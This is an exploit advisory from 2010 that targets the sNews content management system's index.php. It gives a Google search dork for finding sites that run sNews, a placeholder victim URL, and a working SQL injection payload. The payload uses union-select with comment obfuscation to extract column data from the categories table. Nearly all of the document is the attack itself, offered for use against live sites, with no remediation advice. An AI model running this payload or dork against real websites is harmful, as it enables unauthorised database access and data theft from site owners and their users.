# Exploit Title:sNews (index.php) SQL Injection Vulnerability
 
# Date: 2010-07-24
 
# Author: MajoR
 
# Software Link: http://snews.awddesign.co.uk
 
# Version: N/A
 
# Tested on: Wnidows xp SP2
 
# CVE : N/A
 
 
 
====================================================sNews (index.php) SQL Injection Vulnerability
===================================================
 
Author :   MajoR
Email  : Ma-j-oR@hotmail.fr
 
DORK    :  "Powered by sNews " inurl:index.php?id=
 
===================================================
 
 
[+] Vulnerable File :
 
http://www.Victime.com/sNews/index.php?id=
 
[+] ExploiT :
 
 
-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--
 
====================================================
 
 
Greetingz To SlaSSi & Xella